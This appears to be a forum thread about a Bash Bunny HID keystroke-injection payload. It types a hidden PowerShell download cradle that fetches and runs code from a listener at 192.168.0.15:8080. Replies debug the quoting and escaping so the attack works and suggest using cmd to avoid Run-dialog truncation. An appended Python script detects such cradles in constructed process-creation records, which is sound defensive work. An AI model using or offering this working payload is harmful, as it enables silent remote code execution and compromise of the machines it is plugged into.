
Problem With Custom Powershell Script?


bufferoverflow


Hey guys, so I'm trying to run a PowerShell script to call back to my listener. I have tried this on my Win7 VM and on Windows 10, and both times I get the same error.

The error I get is: the Bash Bunny starts, then on the computer it only brings up the Run window, but doesn't copy the script in and enter it. What's the problem?

Here is my payload.txt:

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');
Q DELAY 500
Q ENTER
LED G


Thanks


Try using parentheses around the string.

E.g.:

Q STRING "powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');"



Let's clean that up even better so it works and doesn't substitute the "$"s with empty bash values.


Q STRING "powershell.exe -nop -w hidden -c \"\$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\""

I think I mentioned this before when using the BB to send the PowerShell command.

1) Encapsulate the string parameter in quotes.

2) After doing this, all quotes, "$"s and backslashes (\) you want to send have to be escaped with "\".

3) Encapsulate the actual command string in escaped quotes so it is seen as one parameter argument in Windows.

The idea is to pass your PowerShell commands to powershell.exe as a string.

To really see what is coming out, have your payload launch Notepad and type the executing string into it to see how it looks.


Also, it looks like you are trying to type this all out in the Run command instead of dropping to cmd first. The Run command has a character limit that is much smaller than the command line's before it truncates your input. That may be happening too. You may have to put larger pauses/delays between your quack commands too. I always test with big time delays and then adjust accordingly to smaller times depending on responses.

Edited by PoSHMagiC0de
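The command line this payload ends up typing (powershell.exe -nop -w hidden -c ... new-object net.webclient ... IEX ... downloadstring) is a classic one-line download cradle, and once the quoting is right it shows up verbatim in Windows process-creation telemetry with explorer.exe as the parent, because the HID device typed it into the Run dialog. As an added example that is not from this thread or from Hak5, the script below flags that pattern over constructed Sysmon-style process-creation records; the "key=value|key=value" line format, the indicator list and the two-indicator threshold are all assumptions.

```python
import re
from dataclasses import dataclass, field

# Indicators typical of the one-line download cradle in the thread, as
# case-insensitive regexes over the process command line, each with a label.
CRADLE_INDICATORS = [
    (r"-nop\b|-noprofile\b", "no-profile"),
    (r"-w(indowstyle)?\s+hidden\b", "hidden-window"),
    (r"\bnew-object\s+net\.webclient\b", "webclient"),
    (r"\bdownloadstring\b", "downloadstring"),
    (r"\biex\b|\binvoke-expression\b", "invoke-expression"),
    (r"https?://\S+", "remote-url"),
]
THRESHOLD = 2  # assumption: two or more indicators together count as a hit

@dataclass
class Finding:
    image: str
    parent: str
    matched: list = field(default_factory=list)

def parse_event(line):
    """Parse one constructed 'key=value|key=value' process-creation record."""
    return dict(part.split("=", 1) for part in line.rstrip("\n").split("|") if "=" in part)

def score_command(cmdline):
    """Return the labels of every indicator present in the command line."""
    return [label for pattern, label in CRADLE_INDICATORS if re.search(pattern, cmdline, re.I)]

def detect_cradles(lines, threshold=THRESHOLD):
    """Flag powershell.exe launches whose command line matches enough indicators."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if not ev.get("Image", "").lower().endswith("powershell.exe"):
            continue
        hits = score_command(ev.get("CommandLine", ""))
        if len(hits) >= threshold:
            findings.append(Finding(ev["Image"], ev.get("ParentImage", "?"), hits))
    return findings

# Constructed sample records, not real telemetry. The first mirrors the thread's payload
# as Windows sees it after the inner quotes are delivered correctly; the second is a benign
# scheduled script that shares one flag; the third is not PowerShell at all.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell.exe -nop -w hidden -c \"$W=new-object net.webclient;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe -nop -w hidden",
]

if __name__ == "__main__":
    for f in detect_cradles(SAMPLE_EVENTS):
        print(f"{f.image} (parent {f.parent}): {', '.join(f.matched)}")
```

Only the first record is reported, with all six indicators; the benign -NoProfile run scores one and stays below the threshold.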
